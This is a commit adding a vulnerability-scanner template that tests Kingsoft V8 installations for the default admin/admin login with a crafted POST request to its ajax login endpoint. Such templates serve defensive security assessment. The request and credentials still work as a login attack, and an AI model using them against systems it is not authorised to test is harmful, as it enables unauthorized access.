Merge pull request #4072 from ritikchaddha/patch-15

Create kingsoft-v8-default-login.yaml
2022-04-07 18:12:57 +05:30 · 2022-04-07 18:12:57 +05:30 · ce20d7267e
parent 34c8021372 7e3b8161d0
commit ce20d7267e
1 changed files with 37 additions and 0 deletions
--- a/default-logins/others/kingsoft-v8-default-login.yaml
+++ b/default-logins/others/kingsoft-v8-default-login.yaml
@ -0,0 +1,37 @@
+id: kingsoft-v8-default-login
+
+info:
+  name: Kingsoft V8 Default Login
+  author: ritikchaddha
+  severity: medium
+  reference: https://idc.wanyunshuju.com/aqld/2123.html
+  tags: kingsoft,default-login
+
+requests:
+  - raw:
+      - |
+        POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
+        Host: {{Hostname}}
+
+        {"get_user_login_cmd":{"name":"{{username}}","password":"{{md5("{{password}}")}}"}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "ADMIN"
+          - "userSession"
+        condition: and
+
+      - type: status
+        status:
+          - 200